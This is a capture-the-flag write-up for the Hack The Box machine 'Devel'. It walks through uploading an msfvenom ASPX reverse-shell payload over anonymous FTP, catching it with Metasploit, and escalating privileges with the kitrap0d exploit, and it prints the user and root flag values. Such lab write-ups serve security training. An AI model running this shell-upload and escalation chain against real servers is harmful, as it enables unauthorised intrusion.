Monday, 6 April 2020 DEVEL hackthebox machine writeup

DEVEL Write Up

Machine Created by ch4p

Tools Used for Enumeration:

1. nmap

Tools Used for Exploitation:

1. ftp
2. metasploit

Steps for primary enumeration:

1. At first we use nmap (Network Mapping tool) to scan the box ip. When we run it we got list of some open ports and services running on those ports. On the Devel box we can see, open ports and services are, port 21 for ftp and port 80 for http server. Scan shows ftp server is vulnerable to anonymous ftp login.
command used: nmap -A

Steps to get user.txt: 

1. Scan shows ftp server is vulnerable to anonymous ftp login. The ftp login is showing http server files. Which means we can upload shell and execute it. As the server is IIS (microsoft aspnet), we are going to upload aspx shell.
Command to create metasploit shell: msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=1337 -f aspx > zishan.aspx
2. Login to ftp server as anonymous user using command: ftp and put username anonymous and password blank. Now upload the shell by typing command: put zishan.aspx.
3. Now open reverse tcp listener in metasploit using "use exploit/multi/handler" command. Set lhost to your tun0 ip and lport given port in shell. After running meterpreter listner, open uploaded shell in browser to get a meterpreter session.

4. Background the meterpreter shell using background command. Now use post/multi/recon/local_exploit_suggester and select session with set SESSION 1 command to get local exploits to privilege escalation.
5. Now use exploit/windows/local/ms10_015_kitrap0d module. Set the session and exploit to get meterpreter shell as administrator.
6. Type cat c:/Users/babis/Desktop/user.txt.txt command to get user flag.

Steps to get root.txt:

1. Type cat c:/Users/Administrator/Desktop/root.txt.txt command to get root flag.


1. user.txt flag: 9ecdd6a3aedf24b41562fea70f4cb3e8
2. root.txt flag: e621a0b5041708797c4fc4728bc72b4b




1.Hackersploit walkthrough:

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